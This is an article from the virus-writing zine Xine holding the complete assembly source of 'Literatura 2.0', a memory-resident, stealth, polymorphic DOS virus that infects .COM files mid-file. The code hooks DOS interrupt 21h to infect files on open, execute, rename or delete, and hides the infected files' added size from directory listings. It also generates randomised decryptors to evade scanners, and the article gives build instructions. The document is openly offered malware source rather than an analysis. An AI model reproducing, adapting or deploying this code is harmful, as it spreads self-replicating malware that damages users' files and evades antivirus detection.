
Xine - issue #3 - Phile 208


 
/-----------------------------\
| Xine - issue #3 - Phile 208 |
\-----------------------------/



Comment %
Ü
Û Û V I R U S Û
Û ßÜÛÜ ÜÜ Ü Ü ÜÜ ÜÛÜ Ü Ü ÜÜ
Û Û Û ÛÜÜß Ûß Û Û Û Û Û Ûß Û Û ÜßßÜ ÜßßÜ
Û Û Û Û Û Û Û Û Û Û Û Û Û Üß Û Û
ßßß ß ß ßßß ß ßßßß ß ßß ß ßßßß ßßß ß ßß
TSR size stealth polymorphic COM midfile fast infector
Programmed by Int13h/iKx in Paraguay, South America

Original bytes of the host are stored in an encrypted form at EOF.
Virus code is in a random file position, a polymorphic header gives
control to the decryptor generated by the polymorphic engine.
Greets to Dark Avenger, who was the pioneer in midfile infection,
with his great Commander Bomber. Also greetz to all my IRC-friends.

tasm litera2 /m3
tlink litera2 /t
%

.Model Tiny
.Code
Org 100h
Jumps

Heap equ (offset Final-offset OpaLaVya)
Largor equ (offset OpaLaVya-offset Literatura)
Parrafos1 equ ((Largor+Heap+15)/16)+1
Parrafos2 equ ((Largor+Heap+15)/16)
LDecryptor equ (offset encriptora_1-offset instruccion_2)

LITERATURA:
Basura db 33d dup(090h) ; Space where we will generate
Modificar: ; the polymorphic decryptor
int 3
call Delta
Delta: pop bp
sub bp,offset Delta

mov ax,'i1'
int 21h
cmp ax,'3!'
je LiteraturaIsAlreadySuckingMemory

mov ah,30h
int 21h

cmp al,7
jae LiteraturaIsAlreadySuckingMemory

mov ax,3521h
int 21h
mov word ptr [bp+Vieja21h],bx
mov word ptr [bp+Vieja21h+2],es

mov ax,ds
dec ax
mov es,ax
mov ax,es:[3]
sub ax,Parrafos1
xchg bx,ax

push ds
pop es

mov ah,4ah
int 21h

mov ah,48h
mov bx,Parrafos2
int 21h

dec ax
mov es,ax
mov word ptr es:[1],8
inc ax
mov es,ax
xor di,di

push cs
pop ds

lea si,[bp+offset Literatura]
mov cx,Largor
rep movsb

push es
pop ds
mov ax,2521h
mov dx,(offset Literatura21h-100h)
int 21h


LiteraturaIsAlreadySuckingMemory:
push cs cs
pop ds es

cld
lea si,[bp+offset Primitivos]
mov di,100h
push di
mov cx,15
rep movsw

lea si,[bp+offset Copier]
mov di,06ch
mov ax,di
mov cx,5
repe movsw
movsb

db 0bfh
Reales dw 0
add di,100h
mov cx,Largor
Descifrar_Bytes_Originales:
dw 3580h
Llave db 0
inc di
loop Descifrar_Bytes_Originales

mov cx,Largor
db 0beh
Origen dw 0
add si,100h
db 0bfh
Destino dw 0
add di,100h
xor bx,bx
xor dx,dx
sub bp,bp
jmp ax


Copier: repe movsb
xor si,si
sub di,di
xor ax,ax
sub cx,cx
ret


db " [LiTeRaTuRa 2.0 by Int13h] - MadE in ParaguaY "


Metodo1:db 0e9h
Despla1 dw 666

Metodo2:db 0bbh
Despla2 dw 666
push bx
ret

Metodo3:db 0e8h
Despla3 dw 666

Metodo4:db 0bbh
Despla4 dw 666
jmp bx

Metodo5:db 0bbh
Despla5 dw 666
call bx

Metodo6:push cs
db 0bbh
Despla6 dw 666
push bx
retf


STEALTH1:
xor ah,0bah
pushf
call dword ptr cs:[Vieja21h-100h]
test al,al
jnz Erebo

push ax bx es

mov ah,51h
int 21h

mov es,bx
cmp bx,es:[16h]
jne Fuera

mov bx,dx
mov al,[bx]
push ax

mov ah,2fh
int 21h
pop ax
inc al
jnz FCBComun
add bx,7
FCBComun:
mov al,byte ptr es:[bx+17h]
and al,00011111b
cmp al,00011110b
jne Fuera

cmp word ptr es:[bx+1dh],Largor
ja Sustraer

cmp word ptr es:[bx+1fh],0
je Fuera
Sustraer:sub word ptr es:[bx+1dh],Largor
Fuera: pop es bx ax
Erebo: retf 2



LITERATURA21h:
cmp ax,'i1' ; Residence Checking
je Chequeo
xor ah,0bah
cmp ah,(03dh xor 0bah) ; File Opening?
je InfectFile
cmp ah,(04bh xor 0bah) ; Program loading?
je InfectFile
cmp ah,(11h xor 0bah) ; FCB find first
je Stealth1
cmp ah,(12h xor 0bah) ; FCB find next
je Stealth1
cmp ah,(4eh xor 0bah) ; DTA find first
je Stealth2
cmp ah,(4fh xor 0bah) ; DTA find next
je Stealth2
cmp ax,0d600h ; Extended Open
je InfectFile
cmp ah,(056h xor 0bah) ; Rename
je InfectFile
cmp ah,(041h xor 0bah) ; Delete
je InfectFile
cmp ah,(043h xor 0bah) ; Get/Set attributes
je InfectFile
cmp ax,08f21h ; Camuflar 3521h
je Ocultar21h_A
cmp ax,09f21h ; Camuflar 2521h
je Ocultar21h_B
xor ah,0bah
Interrupcion_21h:
db 0eah
Vieja21h dd 0
Chequeo:mov ax,'3!'
iret



OCULTAR21h_A:
xor ah,0bah
mov bx,word ptr cs:[(Vieja21h-100h)]
mov es,word ptr cs:[(Vieja21h-100h)+2]
iret


OCULTAR21h_B:
xor ah,0bah
mov word ptr cs:[(Vieja21h-100h)],dx
mov word ptr cs:[(Vieja21h-100h)+2],ds
iret



STEALTH2:
xor ah,0bah
pushf
call dword ptr cs:[Vieja21h-100h]
jc Infierno

pushf
push ax di es bx

mov ah,2fh
int 21h

mov ax,es:[bx+16h]
and al,00011111b
cmp al,00011110b
jne Paso

cmp word ptr es:[bx+1ah],Largor
jb Paso
sub word ptr es:[bx+1ah],Largor

Paso: pop bx es di ax
popf
Infierno:
retf 2


Primitivos db 30d dup(0c3h)


SoloPopear:
jmp PopIt



INFECTFILE:
xor ah,0bah
push ax bx cx dx si di ds es

cmp ax,6c00h
jne Apertura_Standard

cmp dx,0001
jne SoloPopear

mov dx,si

Apertura_Standard:
push dx ds
mov ax,3524h
int 21h
mov word ptr cs:[Real24h-100h],bx
mov word ptr cs:[(Real24h-100h)+2],es

push cs
pop ds

mov ax,2524h
mov dx,offset Handler24h-100h
int 21h

pop ds dx

push ds
pop es
cld
mov di,dx
mov cx,128
mov al,'.'
repne scasb
jne Popeo

mov ax,word ptr es:[di-3]
or ax,02020h
cmp ax,'dn'
je Popeo

xchg si,di
lodsw
or ax,2020h
cmp ax,'oc'
jne Popeo
lodsb
or al,20h
cmp al,'m'
jne Popeo

mov ax,3d02h
pushf
call dword ptr cs:[Vieja21h-100h]
jc Popeo
xchg bx,ax

mov ax,5700h
int 21h
mov word ptr cs:[(Hora-100h)],cx
mov word ptr cs:[(Fecha-100h)],dx
and cl,00011111b
cmp cl,00011110b
je Closeo

push cs cs
pop ds es

mov ah,03fh
mov dx,(offset Primitivos-100h)
mov cx,30
int 21h

mov si,dx
mov ax,[si]
add ah,al
cmp ah,167d
je Closeo

call PunteroFin

and dx,dx
jnz Closeo

cmp ax,60000d
ja Closeo

cmp ax,3000d
jbe Closeo

mov cx,ax
sub cx,(Largor+40)

call Obtener_Numero_Aleatorio
cmp ax,40
ja Okis
mov ax,666

Okis: sub ax,3
mov word ptr [Despla1-100h],ax
mov word ptr [Despla2-100h],ax
mov word ptr [Despla3-100h],ax
mov word ptr [Despla4-100h],ax
mov word ptr [Despla5-100h],ax
mov word ptr [Despla6-100h],ax
add ax,3

mov dx,ax
push dx
mov word ptr [Destino-100h],dx
xor cx,cx
mov ax,4200h
int 21h

mov ah,3fh
mov dx,offset Vafer-100h
mov cx,Largor
int 21h

call PunteroFin

mov word ptr [Reales-100h],ax
mov word ptr [Origen-100h],ax

in al,40h
or al,al
jnz NoCero
inc al
NoCero: mov byte ptr [Llave-100h],al

mov si,offset Vafer-100h
mov cx,Largor
Cifrar_Bytes_Originales:
xor byte ptr [si],al
inc si
loop Cifrar_Bytes_Originales

mov ah,40h
mov cx,Largor
mov dx,offset Vafer-100h
int 21h

call PunteroInicio
mov di,(offset Polymorphic_Header-100h)
mov cx,30
Generate_Garbage:
push cx
push di
mov cx,40
call Obtener_Numero_Aleatorio
mov si,(offset Opcodes_de_un_byte-100h)
add si,ax
pop di
movsb
pop cx
loop Generate_Garbage

mov cx,7
call Obtener_Numero_Aleatorio

call Generate_Polymorphic_Header

mov ah,40h
mov cx,30
mov dx,(offset Polymorphic_Header-100h)
int 21h

pop dx
push dx
xor cx,cx
mov ax,4200h
int 21h

mov si,offset Modificar-100h
mov di,offset Vafer-100h
mov cx,Largor-33d
pop bp
add bp,100h
push bx
call Ygramul
pop bx

mov ah,40h
mov dx,offset Vafer-100h
int 21h

db 0b9h
Hora dw 0
and cl,11100000b
or cl,00011110b
db 0bah
Fecha dw 0
mov ax,5701h
int 21h

Closeo: mov ah,3eh
int 21h

Popeo: push cs
pop ds

lds dword ptr dx,[Real24h-100h]
mov ax,2524h
int 21h

PopIt: pop es ds di si dx cx bx ax
jmp Interrupcion_21h


PunteroInicio:
mov ax,04200h
jmp short Mover
PunteroFin:
mov ax,04202h
Mover: xor cx,cx
cwd
int 21h
ret


Handler24h:
mov al,03
iret


Generate_Polymorphic_Header:
mov byte ptr [Modificar-100h],0cch
cmp ax,2
je UsarMetodo2
cmp ax,3
je UsarMetodo3
cmp ax,4
je UsarMetodo4
cmp ax,5
je UsarMetodo5
cmp ax,6
je UsarMetodo6
call Arreglo_General
mov si,offset Metodo1-100h
movsw
movsb
ret

UsarMetodo2:
call Arreglo_General
mov si,offset Metodo2-100h
movsw
movsw
movsb
ret

UsarMetodo3:
call Arreglo_General
mov byte ptr [Modificar-100h],05dh
mov si,offset Metodo3-100h
movsw
movsb
ret

UsarMetodo4:
call Arreglo_General
mov si,offset Metodo4-100h
movsw
movsw
movsb
ret

UsarMetodo5:
call Arreglo_General
mov byte ptr [Modificar-100h],058h
mov si,offset Metodo5-100h
movsw
movsw
movsb
ret

UsarMetodo6:
call Arreglo_General
mov si,offset Metodo6-100h
movsw
movsw
movsw
ret


Arreglo_General:
mov cx,23
call Obtener_Numero_Aleatorio
sub word ptr [Despla1-100h],ax
add word ptr [Despla2-100h],103h
sub word ptr [Despla3-100h],ax
add word ptr [Despla4-100h],103h
add word ptr [Despla5-100h],103h
add word ptr [Despla6-100h],103h
mov di,offset Polymorphic_Header-100h
add di,ax
ret

; Cheesy engine used to generate random fixed-size decryptors
; Uses xor/sub/add/not/neg/ror/rol/inc/dec for enc/decryption
Ygramul:
mov word ptr [LiteCX1-100h],cx
mov word ptr [LiteCX2-100h],cx
mov word ptr [LiteBP-100h],bp
mov word ptr [LiteES-100h],es
mov word ptr [LiteSI-100h],si
mov word ptr [LiteDI-100h],di

mov si,offset ClaveEnc_1-100h
mov di,offset ClaveDec_1-100h

in ax,40h
test al,al
jnz Pasamos_al
inc al
Pasamos_al:
and ah,ah
jnz Pasamos_ah
dec ah
Pasamos_ah:
mov byte ptr [si+3],ah
mov byte ptr [di+3],ah
mov byte ptr [si],al
mov byte ptr [di],al
in al,40h
or al,al
jnz Listo
inc al
Listo: mov byte ptr [si+6],al
mov byte ptr [di+6],al

push cs
pop es
mov di,offset Encriptora_4-100h+2
mov bx,offset Opcodes_de_un_byte-100h
mov si,6

Rellenar:
mov cx,17
call Obtener_Numero_Aleatorio
xlat
stosb
inc di
inc di
dec si
jnz Rellenar

mov cx,127
call obtener_numero_aleatorio
sub word ptr [LiteBP-100h],ax
mov byte ptr [Desplazamiento1-100h],al
mov byte ptr [Desplazamiento2-100h],al

mov cx,4
call Obtener_Numero_Aleatorio
mov byte ptr [Indice-100h],al
mov si,offset Instruccion_2-100h
mov di,offset Instruccion_3-100h+2
mov bp,offset Instruccion_4-100h

cmp al,1
jnz No_fue_Uno
mov byte ptr [si],0beh
mov byte ptr [di],07ch
mov byte ptr ds:[bp+2],07ch
mov byte ptr ds:[bp+4],046h
jmp short Seleccionar_Contador
No_fue_Uno:
cmp al,2
jnz No_fue_Dos
mov byte ptr [si],0bfh
mov byte ptr [di],07dh
mov byte ptr ds:[bp+2],07dh
mov byte ptr ds:[bp+4],047h
jmp short Seleccionar_Contador
No_fue_Dos:
cmp al,3
jnz Fue_Cuatro
mov byte ptr [si],0bdh
mov byte ptr [di],07eh
mov byte ptr ds:[bp+2],07eh
mov byte ptr ds:[bp+4],045h
jmp short Seleccionar_Contador
Fue_Cuatro:
mov byte ptr [si],0bbh
mov byte ptr [di],07fh
mov byte ptr ds:[bp+2],07fh
mov byte ptr ds:[bp+4],043h

Seleccionar_Contador:
mov cx,6
call Obtener_Numero_Aleatorio
mov ah,byte ptr [Indice-100h]
cmp ah,al
je Seleccionar_Contador
mov byte ptr [Contador-100h],al

mov si,offset Instruccion_1-100h
mov di,offset Instruccion_6-100h
cmp al,1
jnz Uno_no_fue
mov byte ptr [si],0beh
mov byte ptr [di],04eh
jmp short Mutar_registros_de_trabajo
Uno_no_fue:
cmp al,2
jne Dos_no_fue
mov byte ptr [si],0bfh
mov byte ptr [di],04fh
jmp short Mutar_registros_de_trabajo
Dos_no_fue:
cmp al,3
jne Tres_no_fue
mov byte ptr [si],0bdh
mov byte ptr [di],04dh
jmp short Mutar_registros_de_trabajo
Tres_no_fue:
cmp al,4
jne Cuatro_no_fue
mov byte ptr [si],0bbh
mov byte ptr [di],04bh
jmp short Mutar_registros_de_trabajo
Cuatro_no_fue:
cmp al,5
jne Seis_fue
mov byte ptr [si],0b9h
mov byte ptr [di],049h
jmp short Mutar_registros_de_trabajo
Seis_fue:
mov byte ptr [si],0bah
mov byte ptr [di],04ah

Mutar_registros_de_Trabajo:
mov cx,6
call Obtener_Numero_Aleatorio
mov byte ptr [Carga-100h],al
mov cl,byte ptr [Indice-100h]
mov ch,byte ptr [Contador-100h]
cmp al,2
ja No_CX
cmp ch,5
je Mutar_registros_de_Trabajo
jmp short Almacenar
No_CX: cmp al,4
ja No_DX
cmp ch,6
je Mutar_registros_de_Trabajo
jmp short Almacenar
No_DX: cmp cl,4
je Mutar_registros_de_Trabajo
cmp ch,4
je Mutar_registros_de_Trabajo


Almacenar:
and byte ptr [Instruccion_3-100h+2],047h
and byte ptr [Instruccion_4-100h+2],047h

cmp al,1
jnz Uno_no_ha_sido
mov al,00101000b
jmp short ORearlo
Uno_no_ha_sido:
cmp al,2
jne Dos_no_ha_sido
mov al,00001000b
jmp short ORearlo
Dos_no_ha_sido:
cmp al,3
jne Tres_no_ha_sido
mov al,00110000b
jmp short ORearlo
Tres_no_ha_sido:
cmp al,4
jne Cuatro_no_ha_sido
mov al,00010000b
jmp short ORearlo
Cuatro_no_ha_sido:
cmp al,5
jne Fue_Six
mov al,00111000b
jmp short ORearlo
Fue_Six:mov al,00011000b

ORearlo:mov byte ptr [Orear-100h],al
or byte ptr [Instruccion_3-100h+2],al
or byte ptr [Instruccion_4-100h+2],al

mov di,offset Encriptar-100h
mov ax,15
call Llenar_con_basura

mov di,offset Buffer-100h
mov ax,15
call Llenar_con_basura

mov cx,5
call Obtener_Numero_Aleatorio
mov byte ptr [Cantidad-100h],al
mov bp,ax

mov di,offset Encriptar-100h

xor dx,dx
Seleccionar_Instrucciones:
mov si,offset Encriptora_1-100h-3
mov cx,9
call Obtener_Numero_Aleatorio
mov cl,3
mul cl
add si,ax
movsw
movsb
push si
push di
add si,24
mov di,offset Buffer-100h
add di,dx
add dx,3
movsw
movsb
pop di
pop si
dec bp
jnz Seleccionar_Instrucciones

mov bp,3
mov si,offset Encriptar-100h

mov cx,5
Inversor:
mov di,offset Instruccion_4-100h
sub di,bp
add bp,3
movsw
movsb
loop Inversor

mov si,offset Buffer-100h
mov di,offset Encriptar-100h
mov cx,15
rep movsb

mov si,offset Instruccion_4-100h-2
mov al,byte ptr [Orear-100h]
mov cl,3
shr al,cl
xor cx,cx
mov cl,byte ptr [Cantidad-100h]
Proceder:
and byte ptr [si],11111000b
or byte ptr [si],al
sub si,3
loop Proceder


db 0bfh
LiteDI dw 0
db 0b8h
LiteES dw 0
mov es,ax
db 0bah
LiteCX1 dw 0
mov cx,LDecryptor
add word ptr [LiteBP-100h],cx
push cx
mov si,offset Instruccion_2-100h
rep movsb
pop cx
add cx,dx
db 0beh
LiteSI dw 0

Realizar_la_encripcion:
mov bh,byte ptr ds:[si]
Encriptar db 15 dup(0fbh)
mov byte ptr es:[di],bh
inc si
inc di
dec dx
jnz Realizar_la_encripcion
ret


Instruccion_2: db 0beh
LiteBP dw 0
Instruccion_1: db 0bah
LiteCX2 dw 0
Instruccion_3: db 02eh,08ah,07ch
Desplazamiento1 db 0
Desencriptar db 15 dup(0f8h)
Instruccion_4: db 02eh,088h,07ch
Desplazamiento2 db 0
Instruccion_5: inc si
Instruccion_6: dec dx
jnz Instruccion_3


Encriptora_1: db 080h,0c7h
ClaveEnc_1 db 0
Encriptora_2: db 080h,0efh
ClaveEnc_2 db 0
Encriptora_3: db 080h,0f7h
ClaveEnc_3 db 0
Encriptora_4: inc bh
int 3
Encriptora_5: dec bh
sti
Encriptora_6: not bh
stc
Encriptora_7: neg bh
cld
Encriptora_8: ror bh,1
cmc
Encriptora_9: rol bh,1
nop

Desencriptora_1: db 080h,0efh
ClaveDec_1 db 0
Desencriptora_2: db 080h,0c7h
ClaveDec_2 db 0
Desencriptora_3: db 080h,0f7h
ClaveDec_3 db 0
Desencriptora_4: dec bh
nop
Desencriptora_5: inc bh
stc
Desencriptora_6: not bh
clc
Desencriptora_7: neg bh
sti
Desencriptora_8: rol bh,1
cmc
Desencriptora_9: ror bh,1
Opcodes_de_un_byte:
cld
db 090h,0cch,0fch,0fbh,0f8h,0f9h,0f5h,037h,02fh,027h
db 03fh,0ceh,098h,09fh,09bh,040h,048h,043h,04bh,041h
db 049h,042h,04ah,046h,04eh,047h,04fh,045h,04dh,093h
db 099h,091h,092h,095h,096h,097h,0ech,0edh,0d7h


Obtener_Numero_Aleatorio:
push dx
push di
in ax,40h
mov dx,106
mul dx
add ax,1283
mov di,6075
adc dx,0
div di
mov ax,dx
mul cx
div di
pop di
pop dx
inc ax
ret


Llenar_con_basura:
mov bp,ax
Repetir:mov si,offset Opcodes_de_un_byte-100h
mov cx,17
call Obtener_Numero_Aleatorio
add si,ax
movsb
dec bp
jnz Repetir
ret


Cantidad db 0
Orear db 0
Buffer:
Indice db 0
Contador db 0
Carga db 0
db 13 dup(90h)

OpaLaVya:
Real24h dd 0
Polymorphic_Header db 30 dup(0)
Vafer db Largor dup(0)
Final label byte

End LITERATURA
